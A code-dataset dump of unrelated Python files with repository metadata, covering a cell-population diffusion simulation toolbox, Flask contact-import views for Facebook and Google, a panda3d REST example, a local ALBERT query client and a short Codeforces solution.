if not side_length == None: space.set('side_length', str(side_length))
def copy_event_list(self, simulation_results_file):
self.remove_subresult(self.eventList)
self.append_subresult(simulation_results_file.eventList)
self.eventList = simulation_results_file.eventList
self.events = simulation_results_file.events
def set_event_list_header(self, header):
self.eventList.header = header
self.eventList.root.set('header', header)
def add_event_list_column_name(self, column_name):
if self.is_event_list_column_name(column_name): return
self.eventList.add_column_name(column_name)
def is_event_list_column_name(self, column_name):
return (column_name in self.get_event_list_column_names())
def set_up_population(self, detail_level, grid_length, wrapping, bio_array):
for event in self.events:
event.apply_detail_level(detail_level)
event.setup_ranges(grid_length, wrapping)
event.stamp_bio_array(bio_array)
def apply_detail_level(self, detail_level):
for event in self.events:
event.apply_detail_level(detail_level)
def setup_ranges(self, grid_length, wrapping):
for event in self.events:
event.setup_ranges(grid_length, wrapping)
def stamp_bio_array(self, bio_array):
for event in self.events:
event.stamp_bio_array(bio_array)
def consumers(self):
return [e for e in self.events if e.vars['mark'] == 2]
def producers(self):
return [e for e in self.events if e.vars['mark'] == 3]
def calc_rates_from_concn_array(self, concn_array, consume_rate,
produce_rate, rate_array=None):
for event in self.events:
event.calc_rate_from_concn_array(concn_array, consume_rate,
produce_rate, rate_array=rate_array)
event.calc_amean_surf_concn(concn_array)
def set_concn_rate_results(self, concn_array, rate_array):
# This doesn't take account of detail_level!
# See update_concn_rate_results()
calculated_flux = \
numpy.sum(numpy.absolute(rate_array))/2
rel_diff = abs(numpy.sum(rate_array))/calculated_flux
max_concn = numpy.max(concn_array)
amean_concn = amean(concn_array)
min_concn = numpy.min(concn_array)
concn_rate = self.find('./simulation/concn_rate')
if concn_rate == None:
sim = self.find('./simulation')
concn_rate = xmlTree.SubElement(sim, 'concn_rate')
concn_rate.set('calculated_flux', str(calculated_flux))
concn_rate.set('rel_diff', str(rel_diff))
concn_rate.set('max_concn', str(max_concn))
concn_rate.set('amean_concn', str(amean_concn))
concn_rate.set('min_concn', str(min_concn))
def update_concn_rate_results(self, detail_level):
# This is a bit of a fudge: set_concn_rate_results() implicitly assumes
# detail_level = 1
production = numpy.sum([e.vars['rate'] for e in self.producers()])
consumption = numpy.sum([e.vars['rate'] for e in self.consumers()])
calculated_flux = (production - consumption)/2
rel_diff = abs(production + consumption)/calculated_flux
concn_rate = self.find('./simulation/concn_rate')
concn_rate.set('calculated_flux', str(calculated_flux))
concn_rate.set('rel_diff', str(rel_diff))
def get_amean_concn(self):
return float(self.find('.simulation/concn_rate').attrib['amean_concn'])
def get_calculated_flux(self):
return float(self.find('.simulation/concn_rate').attrib['calculated_flux'])
def get_relative_difference(self):
return float(self.find('.simulation/concn_rate').attrib['rel_diff'])
def get_mean_surf_concn(self, cell_type='all', mean='amean'):
if cell_type == 'all':
events = self.events
elif cell_type == 'consumers':
events = self.consumers()
elif cell_type == 'producers':
events = self.producers()
if not mean in ['amean', 'gmean', 'hmean']:
toolbox_basic.error_message('toolbix_elmer.Simulation.get_mean_NN_dist()',
'mean not recognised: %s'%(mean))
exec 'def mean(x): return %s(x)'%(mean)
return mean([e.vars['amean_surf_concn'] for e in events])
class EventResult(toolbox_results.SingleCSVline):
def __init__(self, header, text):
toolbox_results.SingleCSVline.__init__(self, header, text)
def apply_detail_level(self, detail_level):
# If detail_level is odd:
if (detail_level%2 == 1):
diff = int((detail_level-1)/2)
i_cen = int(self.vars['x'] * detail_level)
self.vars['x'] = (i_cen+0.5)/detail_level
self.vars['i_min'] = i_cen - diff
self.vars['i_max'] = i_cen + diff + 1
j_cen = int(self.vars['y'] * detail_level)
self.vars['y'] = (j_cen+0.5)/detail_level
self.vars['j_min'] = j_cen - diff
self.vars['j_max'] = j_cen + diff + 1
if 'z' in self.vars.keys():
k_cen = int(self.vars['z'] * detail_level)
self.vars['z'] = (k_cen+0.5)/detail_level
self.vars['k_min'] = k_cen - diff
self.vars['k_max'] = k_cen + diff + 1
# If detail_level is even:
else:
diff = int(detail_level/2)
i_cen = int(round(self.vars['x'] * detail_level))
self.vars['x'] = i_cen/detail_level
self.vars['i_min'] = i_cen - diff
self.vars['i_max'] = i_cen + diff
j_cen = int(round(self.vars['y'] * detail_level))
self.vars['y'] = j_cen/detail_level
self.vars['j_min'] = j_cen - diff
self.vars['j_max'] = j_cen + diff
if 'z' in self.vars.keys():
k_cen = int(round(self.vars['z'] * detail_level))
self.vars['z'] = k_cen/detail_level
self.vars['k_min'] = k_cen - diff
self.vars['k_max'] = k_cen + diff
def setup_ranges(self, grid_length, wrapping):
# Take care of any edge effects:
i_range = range(self.vars['i_min'], self.vars['i_max'])
j_range = range(self.vars['j_min'], self.vars['j_max'])
if 'z' in self.vars.keys():
k_range = range(self.vars['k_min'], self.vars['k_max'])
if wrapping:
self.i_range = [i%grid_length for i in i_range]
self.j_range = [j%grid_length for j in j_range]
if 'z' in self.vars.keys():
self.k_range = [k%grid_length for k in k_range]
else:
self.i_range = [i for i in i_range if i >= 0 and i <= grid_length]
self.j_range = [j for j in j_range if j >= 0 and j <= grid_length]
if 'z' in self.vars.keys():
self.k_range = [k for k in k_range if k>=0 and k<=grid_length]
def stamp_bio_array(self, bio_array):
for i in self.i_range:
for j in self.j_range:
if 'z' in self.vars.keys():
for k in self.k_range:
bio_array[i][j][k] = self.vars['mark']
else:
bio_array[i][j] = self.vars['mark']
def calc_rate_from_concn_array(self, concn_array, consume_rate,
produce_rate, rate_array=None):
self.vars['rate'] = 0.0
if self.vars['mark'] == 2: kinetic_rate = consume_rate
else: kinetic_rate = produce_rate
counter = 0
for (i, j) in [(i, j) for i in self.i_range for j in self.j_range]:
concns = [concn_array[I][J] for I in [i, i+1] for J in [j, j+1]]
rates = [kinetic_rate(concn) for concn in concns]
mean_rate = numpy.mean(rates)
if not rate_array == None:
rate_array[i][j] = mean_rate
self.vars['rate'] += mean_rate
counter += 1
self.vars['rate'] /= counter
return self.vars['rate']
def calc_amean_surf_concn(self, concn_array):
surface_nodes = [(i, self.j_range[0]) for i in self.i_range] + \
[(i, self.j_range[-1]+1) for i in self.i_range] + \
[(self.i_range[0], j) for j in self.j_range[1:]] + \
[(self.i_range[-1]+1, j) for j in self.j_range+[self.j_range[-1]+1]]
concns = [concn_array[i][j] for (i, j) in surface_nodes]
self.vars['amean_surf_concn'] = numpy.mean(concns)
return self.vars['amean_surf_concn']
def position(self):
if 'z' in self.vars.keys():
return (self.vars['x'], self.vars['y'], self.vars['z'])
else:
return (self.vars['x'], self.vars['y'])
class AnalyticApproach:
def __init__(self):
self.A = 1
self.qmaxA = 1.0
self.pmax = 10.0
self.kA = 1.0
self.B = 1
self.qmaxB = 1.0
self.pmin = 0.1
self.kB = 1.0
def set_parameters(self, A=None, qmaxA=None, pmax=None, kA=None,
B=None, qmaxB=None, pmin=None, kB=None):
self.A = self.A if A == None else A
self.qmaxA = self.qmaxA if qmaxA == None else qmaxA
self.pmax = self.pmax if pmax == None else pmax
self.kA = self.kA if kA == None else kA
self.B = self.B if B == None else B
self.qmaxB = self.qmaxB if qmaxB == None else qmaxB
self.pmin = self.pmin if pmin == None else pmin
self.kB = self.kB if kB == None else kB
def production(self, p):
return self.A*self.qmaxA*(self.pmax-p)/(self.pmax+self.kA+p)
def calc_equal_concn(self):
qmaxAA, qmaxBB = self.qmaxA*self.A, self.qmaxB*self.B
q2 = qmaxAA + qmaxBB
q1 = qmaxAA*(self.kB + self.pmin - self.pmax) \
+ qmaxBB*(self.kA + self.pmax - self.pmin)
q0 = - qmaxBB*self.kA*self.pmin \
- qmaxAA*self.kB*self.pmax - q2*self.pmax*self.pmin
roots = numpy.roots([q2, q1, q0])
p = max(roots)
return p
def calc_equal_concn_rate(self):
p = self.calc_equal_concn()
return self.production(p)
def sensitivity_analysis(self, cv=0.1, return_rate=False, return_diffs=True):
params = (self.A, self.qmaxA, self.pmax, self.kA,
self.B, self.qmaxB, self.pmin, self.kB)
if return_rate:
norm_val = self.calc_equal_concn_rate()
else:
norm_val = self.calc_equal_concn()
max_val, min_val = norm_val, norm_val
cv_range = [(1-cv), 1, (1+cv)]
for a in cv_range:
for qa in cv_range:
for px in cv_range:
for ka in cv_range:
for b in cv_range:
for qb in cv_range:
for pn in cv_range:
for kb in cv_range:
self.set_parameters(A=a*params[0],
qmaxA=qa*params[1],
pmax=px*params[2],
kA=ka*params[3],
B=b*params[4],
qmaxB=qb*params[5],
pmin=pn*params[6],
kB=kb*params[7])
if return_rate:
val = self.calc_equal_concn_rate()
else:
val = self.calc_equal_concn()
max_val = max(max_val, val)
min_val = min(min_val, val)
self.set_parameters(A=params[0], qmaxA=params[1], pmax=params[2],
kA=params[3], B=params[4], qmaxB=params[5],
pmin=params[6], kB=params[7])
if return_diffs:
minus_diff = norm_val - min_val
plus_diff = max_val - norm_val
return minus_diff, plus_diff
else:
return min_val, max_val
class SimCollection:
def __init__(self, simulation):
if isinstance(simulation, list):
self.simulations = simulation
simulation = self.simulations[0]
else:
self.simulations = [simulation]
self.wrapping = simulation.wrapping
self.side_length = simulation.side_length
self.is_3d = simulation.is_3d
self.consumers = simulation.consumers
self.producers = simulation.producers
self.random_seed = simulation.random_seed
def add_if_belongs(self, simulation, diffs_allowed=['random_seed']):
comparitor = self.simulations[0]
belongs = True
if not simulation.wrapping == self.wrapping and \
not 'wrapping' in diffs_allowed:
belongs = False
if not simulation.side_length == self.side_length and \
not 'side_length' in diffs_allowed:
belongs = False
if not simulation.is_3d == self.is_3d and \
not 'is_3d' in diffs_allowed:
belongs = False
if not simulation.consumers == self.consumers and \
not 'consumers' in diffs_allowed:
belongs = False
if not simulation.producers == self.producers and \
not 'producers' in diffs_allowed:
belongs = False
if not simulation.random_seed == self.random_seed and \
not 'random_seed' in diffs_allowed:
belongs = False
if belongs:
self.simulations.append(simulation)
return belongs
def get_calculated_fluxes(self, detail_level, sif_name):
out = []
for sim in self.simulations:
rf = sim.get_run_results(detail_level, sif_name)
if detail_level > 1:
rf.update_concn_rate_results(detail_level)
out.append(rf.get_calculated_flux())
return out
def get_amean_concns(self, detail_level, sif_name):
return \
[sim.get_run_results(detail_level, sif_name).get_amean_concn() \
for sim in self.simulations]
def estimates_from_concn(self, detail_level, sif_name, D, pmin,
dist_mean='amean'):
sides = 6 if self.is_3d else 4
estimates = []
for sim in self.simulations:
p = sim.get_amean_concn(detail_level, sif_name)
d = sim.get_mean_NN_dist(detail_level, mean=dist_mean)
estimates.append(D*self.producers*sides*(p-pmin)/d)
return estimates
def estimates_from_surf_concn(self, detail_level, sif_name, D,
dist_mean='amean'):
sides = 6 if self.is_3d else 4
estimates = []
for sim in self.simulations:
pmin = sim.get_mean_surf_concn(detail_level, sif_name,
cell_type='consumers', mean='amean')
pmax = sim.get_mean_surf_concn(detail_level, sif_name,
cell_type='producers', mean='amean')
d = sim.get_mean_NN_dist(detail_level, mean=dist_mean)
estimates.append(D*self.producers*sides*(pmax-pmin)/d)
return estimates
def find_sim_collections(results_dir, diffs_allowed=['random_seed']):
sim_collections = []
for sim in get_replicate_simulations(results_dir):
sim_collection = None
for sc in sim_collections:
if sc.add_if_belongs(sim):
sim_collection = sc
break
if sim_collection == None:
sim_collection = SimCollection(sim)
sim_collections.append(sim_collection)
return sim_collections
# points should be given as a 2xn numpy.array
# side_length should be a positive real number (usually an integer)
def wrap_points(points, side_length, num_wraps=1, is_3d=False):
diffs = [i*side_length for i in range(num_wraps+1)]
diffs.extend([-d for d in diffs[1:]])
new_points = []
for point in points:
for x_diff in diffs:
for y_diff in diffs:
if is_3d:
for z_diff in diffs:
new_points.append(point + (x_diff, y_diff, z_diff))
else:
new_points.append(point + (x_diff, y_diff))
return numpy.array(new_points)
def every_cell_spatial_stats(root_dir, detail_level=1):
results_file = get_detail_level_results(root_dir, detail_level=detail_level)
results_file.get_space_parameters()
points = numpy.array([e.position() for e in results_file.events])
if results_file.wrapping:
points = wrap_points(points, results_file.side_length,
is_3d=results_file.is_3d)
triangulation = Delaunay(points)
indices, indptr = triangulation.vertex_neighbor_vertices
for event in results_file.events:
e_point = numpy.array(event.position())
row_number = toolbox_basic.find_index_of_row_in_array(points, e_point)
event.vars['eDT_nnbs'] = indices[row_number+1] - indices[row_number] +1
neighbor_indices = indptr[indices[row_number]:indices[row_number+1]]
nb_points = [points[i] for i in neighbor_indices]
def get_replicate_results(replicates_dir):
replicates_dir = toolbox_basic.check_path(replicates_dir)
results_path = os.path.join(replicates_dir, 'results.xml')
results_file = ReplicatesFile(path=results_path)
return results_file
def get_replicate_simulations(replicates_dir):
return [Simulation(d) for d in toolbox_basic.subdir_list(replicates_dir)]
def setup_replicate_results(replicates_dir):
results_file = get_replicate_results(replicates_dir)
replicate_simulations = get_replicate_simulations(replicates_dir)
wrapping = replicate_simulations[0].wrapping
is_3d=replicate_simulations[0].is_3d
side_length=replicate_simulations[0].side_length
results_file.set_space_parameters(wrapping=wrapping, is_3d=is_3d, side_length=side_length)
for sim in replicate_simulations:
if not ((sim.wrapping == wrapping) and
(sim.is_3d == is_3d) and
(sim.side_length == side_length)):
toolbox_basic.error_message('toolbox_elmer.get_replicates_results():'+
'Replicates have different space parameters', replicates_dir)
exit()
results_file.write()
return results_file
def get_replicate_results_basics(replicates_dir,
detail_level=1, sif_name='elmer_standard'):
replicate_simulations = get_replicate_simulations(replicates_dir)
results_file = setup_replicate_results(replicates_dir)
dl_resuls = results_file.get_detail_level_results(detail_level=detail_level)
sif_results = results_file.get_solver_input_file_results(
detail_level=detail_level, sif_name=sif_name)
#for sim in replicate_simulations:
results_file.write()
def hydrogen_logo(axis, bottom_left=(0.9, 0.9), height_width=0.1):
color = '0.5'
circle = toolbox_schematic.Circle()
circle.set_defaults(edgecolor='none', facecolor=color, transform=True)
radius = 0.2*height_width
center_A = (bottom_left[0] + radius, bottom_left[1] + height_width - radius)
center_B = (bottom_left[0] + height_width - radius, bottom_left[1] + radius)
circle.set_points(center_A, radius)
circle.draw(axis)
circle.set_points(center_B, radius)
circle.draw(axis)
print center_A, center_B
axis.plot([center_A[0], center_B[0]], [center_A[1], center_B[1]], color, linestyle='-', transform=axis.transAxes)
#center = ((bottom_left[0]+top_right[0])/2, (bottom_left[1]+top_right[1])/2)
'''
def get_combined_results(root_dir, detail_level=1, sif_name='elmer_standard'):
dl_results = get_detail_level_results(root_dir, detail_level=detail_level)
run_results = get_run_results(root_dir,
detail_level=detail_level, sif_name=sif_name)
for e in run_results.events:
for o in dl_results.events:
if o.position() == e.position():
for attrib in o.vars.keys():
e.vars[attrib] = o.vars[attrib]
run_results.set_read_only()
return run_results
'''
'''
def get_rate_array(root_dir, detail_level=1, sif_name='elmer_standard'):
run_dir = get_run_dir(root_dir,detail_level=detail_level,sif_name=sif_name)
array_path = os.path.join(run_dir, 'rate_array.npy')
array_path = toolbox_basic.check_path(array_path)
array = numpy.load(array_path)
return array
'''
'''
def calc_nearest_neighbor_distances(root_dir, detail_level=1):
simulation = Simulation(root_dir)
results_file = simulation.get_detail_level_results(detail_level)
#if ('eNN_dist' in results_file.get_eventList_column_names()): return
if results_file.is_event_list_column_name('eNN_dist'): return
#results_file.set_space_parameters()
cons_points = numpy.array([e.position() for e in results_file.consumers()])
prod_points = numpy.array([e.position() for e in results_file.producers()])
if simulation.wrapping:
cons_points = wrap_points(cons_points, simulation.side_length,
is_3d=simulation.is_3d)
prod_points = wrap_points(prod_points, simulation.side_length,
is_3d=simulation.is_3d)
cons_tree = KDTree(cons_points)
prod_tree = KDTree(prod_points)
for e in results_file.events:
c_dist, id = cons_tree.query(e.position())
p_dist, id = prod_tree.query(e.position())
e.vars['sNN_dist'] = c_dist if (e.vars['mark'] == 2) else p_dist
e.vars['oNN_dist'] = c_dist if (e.vars['mark'] == 3) else p_dist
e.vars['eNN_dist'] = min(c_dist, p_dist)
results_file.add_event_list_column_name('eNN_dist')
results_file.add_event_list_column_name('oNN_dist')
results_file.add_event_list_column_name('sNN_dist')
results_file.eventList.update_text()
results_file.write()
'''
| en | 0.486112 | #/usr/bin/python # Set up the space from the protocol file. # This isn't quite correct! Without wrapping, Elmer skips some nodes %s\n1 ### Make mesh.header # The 2 denotes dimensions, 202's are boundaries, 404's are elements. ### Make mesh.nodes # Shouldn't this take account of detail_level? # Consider changing this line to #text += '%d -1 %.1f %.1f 0.0\n' %(i+1, x, y) ### Make mesh.elements ### Make mesh.boundary # Along the bottom of the array (x=max) from left (y=0) to right (y=max). # Down the left of the array (y=0), from top (x=0) to bottom (x=max). # Along the top of the array (x=0) from left (y=0) to right (y=max). # Down the left of the array (y=max), from top (x=0) to bottom (x=max). # If cells_file.events is empty then the detail level directory has # probably only just been created, and this file does not yet exist. # Finally, update and save the 'cell_locations.xml' file. #rf.eventList.update_text() #axis.set_xlabel(r'Product concentration ($\mu$M)') #self.plot_rate_array(axis, detail_level, sif_name) #label = r'Product concentration ($\mu$M)' # This doesn't take account of detail_level! # See update_concn_rate_results() # This is a bit of a fudge: set_concn_rate_results() implicitly assumes # detail_level = 1 # If detail_level is odd: # If detail_level is even: # Take care of any edge effects: # points should be given as a 2xn numpy.array # side_length should be a positive real number (usually an integer) #for sim in replicate_simulations: #center = ((bottom_left[0]+top_right[0])/2, (bottom_left[1]+top_right[1])/2) def get_combined_results(root_dir, detail_level=1, sif_name='elmer_standard'): dl_results = get_detail_level_results(root_dir, detail_level=detail_level) run_results = get_run_results(root_dir, detail_level=detail_level, sif_name=sif_name) for e in run_results.events: for o in dl_results.events: if o.position() == e.position(): for attrib in o.vars.keys(): e.vars[attrib] = o.vars[attrib] run_results.set_read_only() return run_results def get_rate_array(root_dir, detail_level=1, sif_name='elmer_standard'): run_dir = get_run_dir(root_dir,detail_level=detail_level,sif_name=sif_name) array_path = os.path.join(run_dir, 'rate_array.npy') array_path = toolbox_basic.check_path(array_path) array = numpy.load(array_path) return array def calc_nearest_neighbor_distances(root_dir, detail_level=1): simulation = Simulation(root_dir) results_file = simulation.get_detail_level_results(detail_level) #if ('eNN_dist' in results_file.get_eventList_column_names()): return if results_file.is_event_list_column_name('eNN_dist'): return #results_file.set_space_parameters() cons_points = numpy.array([e.position() for e in results_file.consumers()]) prod_points = numpy.array([e.position() for e in results_file.producers()]) if simulation.wrapping: cons_points = wrap_points(cons_points, simulation.side_length, is_3d=simulation.is_3d) prod_points = wrap_points(prod_points, simulation.side_length, is_3d=simulation.is_3d) cons_tree = KDTree(cons_points) prod_tree = KDTree(prod_points) for e in results_file.events: c_dist, id = cons_tree.query(e.position()) p_dist, id = prod_tree.query(e.position()) e.vars['sNN_dist'] = c_dist if (e.vars['mark'] == 2) else p_dist e.vars['oNN_dist'] = c_dist if (e.vars['mark'] == 3) else p_dist e.vars['eNN_dist'] = min(c_dist, p_dist) results_file.add_event_list_column_name('eNN_dist') results_file.add_event_list_column_name('oNN_dist') results_file.add_event_list_column_name('sNN_dist') results_file.eventList.update_text() results_file.write() | 2.023053 | 2 |
oleander/views/contacts.py | honzajavorek/oleander | 0 | 6623869 | # -*- coding: utf-8 -*-
from flask import render_template, redirect, url_for, request, flash, session
from flask.ext.login import login_required, current_user
from oleander import app, db, facebook, google
from oleander.forms import EmailContactForm
from oleander.models import Contact, FacebookContact, GoogleContact, EmailContact
from gdata.contacts.client import ContactsQuery
def create_email_contact(email):
if email.endswith(('gmail.com', 'googlemail.com')):
return GoogleContact()
return EmailContact()
@app.route('/contacts/', methods=('GET', 'POST'))
@login_required
def contacts():
"""Contacts management page."""
form = EmailContactForm()
if form.validate_on_submit():
with db.transaction as session:
contact = create_email_contact(form.email.data)
form.populate_obj(contact)
contact.user = current_user
session.add(contact)
return redirect(url_for('contacts'))
contacts = current_user.contacts.order_by('name')
return render_template('contacts.html', form=form, contacts=contacts)
@app.route('/contacts/delete/<int:id>')
@login_required
def delete_contact(id):
"""Removes contact by ID."""
contact = current_user.get_contact_or_404(id)
if contact.is_primary:
flash('Cannot delete primary contact.')
elif list(contact.attendance):
flash('Cannot delete contact involved in events.')
else:
with db.transaction as session:
current_user.delete_contact(id)
return redirect(url_for('contacts'))
@app.route('/contacts/import/facebook')
@login_required
def import_facebook_friends():
try:
api = facebook.create_api()
me = api.get('me')
friends = api.get('me/friends')['data']
friends.append(me)
for friend in friends:
with db.transaction as session:
contact = current_user.find_facebook_contact(friend['id'])
if not contact:
contact = FacebookContact()
contact.name = friend['name']
contact.facebook_id = friend['id']
contact.user = current_user
contact.belongs_to_user = friend['id'] == me['id']
session.add(contact)
else:
contact.name = friend['name']
return redirect(url_for('contacts'))
except (facebook.ConnectionError, facebook.OAuthError):
return redirect(facebook.create_authorize_url(
action_url=url_for('import_facebook_friends'),
error_url=url_for('contacts')
))
@app.route('/contacts/import/google')
@login_required
def import_google_contacts():
try:
api = google.create_api(google.ContactsClient)
group_id = None
feed = api.GetGroups()
for entry in feed.entry:
if entry.title.text == 'System Group: My Contacts':
group_id = entry.id.text
query = ContactsQuery()
query.max_results = 10000
if group_id:
query.group = group_id
feed = api.GetContacts(q=query)
my_emails = current_user.emails
for entry in feed.entry:
with db.transaction as session:
for email in entry.email:
if not entry.name or not entry.name.full_name:
continue
contact = current_user.find_email_contact(email.address)
if not contact:
contact = create_email_contact(email.address)
contact.name = entry.name.full_name.text
contact.email = email.address
contact.user = current_user
contact.belongs_to_user = email.address in my_emails
session.add(contact)
else:
contact.name = entry.name.full_name.text
return redirect(url_for('contacts'))
except (google.ConnectionError, google.UnauthorizedError):
return redirect(google.create_authorize_url(
action_url=url_for('import_google_contacts'),
error_url=url_for('contacts'),
scope='https://www.google.com/calendar/feeds/ https://www.google.com/m8/feeds/'
)) | # -*- coding: utf-8 -*-
from flask import render_template, redirect, url_for, request, flash, session
from flask.ext.login import login_required, current_user
from oleander import app, db, facebook, google
from oleander.forms import EmailContactForm
from oleander.models import Contact, FacebookContact, GoogleContact, EmailContact
from gdata.contacts.client import ContactsQuery
def create_email_contact(email):
if email.endswith(('gmail.com', 'googlemail.com')):
return GoogleContact()
return EmailContact()
@app.route('/contacts/', methods=('GET', 'POST'))
@login_required
def contacts():
"""Contacts management page."""
form = EmailContactForm()
if form.validate_on_submit():
with db.transaction as session:
contact = create_email_contact(form.email.data)
form.populate_obj(contact)
contact.user = current_user
session.add(contact)
return redirect(url_for('contacts'))
contacts = current_user.contacts.order_by('name')
return render_template('contacts.html', form=form, contacts=contacts)
@app.route('/contacts/delete/<int:id>')
@login_required
def delete_contact(id):
"""Removes contact by ID."""
contact = current_user.get_contact_or_404(id)
if contact.is_primary:
flash('Cannot delete primary contact.')
elif list(contact.attendance):
flash('Cannot delete contact involved in events.')
else:
with db.transaction as session:
current_user.delete_contact(id)
return redirect(url_for('contacts'))
@app.route('/contacts/import/facebook')
@login_required
def import_facebook_friends():
try:
api = facebook.create_api()
me = api.get('me')
friends = api.get('me/friends')['data']
friends.append(me)
for friend in friends:
with db.transaction as session:
contact = current_user.find_facebook_contact(friend['id'])
if not contact:
contact = FacebookContact()
contact.name = friend['name']
contact.facebook_id = friend['id']
contact.user = current_user
contact.belongs_to_user = friend['id'] == me['id']
session.add(contact)
else:
contact.name = friend['name']
return redirect(url_for('contacts'))
except (facebook.ConnectionError, facebook.OAuthError):
return redirect(facebook.create_authorize_url(
action_url=url_for('import_facebook_friends'),
error_url=url_for('contacts')
))
@app.route('/contacts/import/google')
@login_required
def import_google_contacts():
try:
api = google.create_api(google.ContactsClient)
group_id = None
feed = api.GetGroups()
for entry in feed.entry:
if entry.title.text == 'System Group: My Contacts':
group_id = entry.id.text
query = ContactsQuery()
query.max_results = 10000
if group_id:
query.group = group_id
feed = api.GetContacts(q=query)
my_emails = current_user.emails
for entry in feed.entry:
with db.transaction as session:
for email in entry.email:
if not entry.name or not entry.name.full_name:
continue
contact = current_user.find_email_contact(email.address)
if not contact:
contact = create_email_contact(email.address)
contact.name = entry.name.full_name.text
contact.email = email.address
contact.user = current_user
contact.belongs_to_user = email.address in my_emails
session.add(contact)
else:
contact.name = entry.name.full_name.text
return redirect(url_for('contacts'))
except (google.ConnectionError, google.UnauthorizedError):
return redirect(google.create_authorize_url(
action_url=url_for('import_google_contacts'),
error_url=url_for('contacts'),
scope='https://www.google.com/calendar/feeds/ https://www.google.com/m8/feeds/'
)) | en | 0.776937 | # -*- coding: utf-8 -*- Contacts management page. Removes contact by ID. | 2.631317 | 3 |
examples/01-json-get.py | NxtGames/p3d-rest | 1 | 6623870 | """
Author: <NAME>
Written: 07/30/2019
The MIT License (MIT)
Copyright (c) 2019 Nxt Games
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from panda3d_rest import http
from direct.showbase.ShowBase import ShowBase
base = ShowBase()
def handle_ip(data):
"""
Handles the callback data
"""
ip = data.get('ip', 'unknown')
print('My public ip is: %s' % ip)
base.rest = http.HTTPRest()
base.rest.setup()
base.rest.perform_json_get_request('https://api.ipify.org/?format=json', callback=handle_ip)
base.run() | """
Author: <NAME>
Written: 07/30/2019
The MIT License (MIT)
Copyright (c) 2019 Nxt Games
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from panda3d_rest import http
from direct.showbase.ShowBase import ShowBase
base = ShowBase()
def handle_ip(data):
"""
Handles the callback data
"""
ip = data.get('ip', 'unknown')
print('My public ip is: %s' % ip)
base.rest = http.HTTPRest()
base.rest.setup()
base.rest.perform_json_get_request('https://api.ipify.org/?format=json', callback=handle_ip)
base.run() | en | 0.763082 | Author: <NAME> Written: 07/30/2019 The MIT License (MIT) Copyright (c) 2019 Nxt Games Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Handles the callback data | 1.929084 | 2 |
qbert/extraction_api.py | StrangeTcy/Q-BERT | 57 | 6623871 | <gh_stars>10-100
import requests
import json
import random
import time
def call_askbert(sentence, threshold=0.2, attribute=True):
url = "http://localhost:5000/"
response = requests.request("POST", url, data={"state": sentence, "threshold": threshold, "attribute": attribute})
response = json.JSONDecoder().decode(response.text)
return response
def set_batch_mode(batch_size):
url = "http://localhost:8081/models"
querystring = {"url": "albert.mar", "batch_size": batch_size, "max_batch_delay": "100", "initial_workers": "1"}
response = requests.request("POST", url, params=querystring)
print(response.text)
| import requests
import json
import random
import time
def call_askbert(sentence, threshold=0.2, attribute=True):
url = "http://localhost:5000/"
response = requests.request("POST", url, data={"state": sentence, "threshold": threshold, "attribute": attribute})
response = json.JSONDecoder().decode(response.text)
return response
def set_batch_mode(batch_size):
url = "http://localhost:8081/models"
querystring = {"url": "albert.mar", "batch_size": batch_size, "max_batch_delay": "100", "initial_workers": "1"}
response = requests.request("POST", url, params=querystring)
print(response.text) | none | 1 | 2.807881 | 3 | |
Codeforces/A_Postcards_and_photos.py | anubhab-code/Competitive-Programming | 0 | 6623872 | s=input()
c=0
t=0
old=""
for i in s:
if i==old:
c+=1
if c>=5 or i!=old:
t+=1
c=0
old=i
print(t) | s=input()
c=0
t=0
old=""
for i in s:
if i==old:
c+=1
if c>=5 or i!=old:
t+=1
c=0
old=i
print(t) | none | 1 | 3.494359 | 3 | |
fs_util.py | akhandpuresoftware/rawfile-localpv | 38 | 6623873 | <filename>fs_util.py
import json
import os
import subprocess
def path_stats(path):
